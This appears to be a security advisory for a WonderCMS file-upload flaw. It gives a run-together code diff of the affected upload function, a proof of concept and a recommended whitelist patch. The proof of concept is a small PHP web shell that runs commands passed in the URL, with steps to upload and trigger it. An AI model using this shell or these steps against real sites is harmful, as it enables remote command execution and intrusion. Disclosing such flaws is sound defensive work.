Affected Code:
public static function _uploadFile(){+-if( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile'])&& ! isset($_REQUEST['token']))return;+ private static function uploadFileAction()-if(isset($_REQUEST['token'])&& $_REQUEST['token']== wCMS::_generateToken()&& isset($_FILES['uploadFile'])){
Proof of Concept
Steps to Reproduce:1. Login with a valid credentials
2. Select Files option from the Settings menu of Content
3. Upload a filewith php extension containing the below code:<?php
$cmd=$_GET['cmd'];
system($cmd);
?>4. Click on Upload
5. Once the fileis uploaded Click on the uploaded fileand add ?cmd= to
the URL followed by a system command such as whoami,time,date etc.
Example:
http://localhost:8081/wondercms/files/shell.php?cmd=dir
Recommended Patch:
Create a whitelist of allowed filetypes.
The patch that addresses this bug is available here:
https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split
At line 742
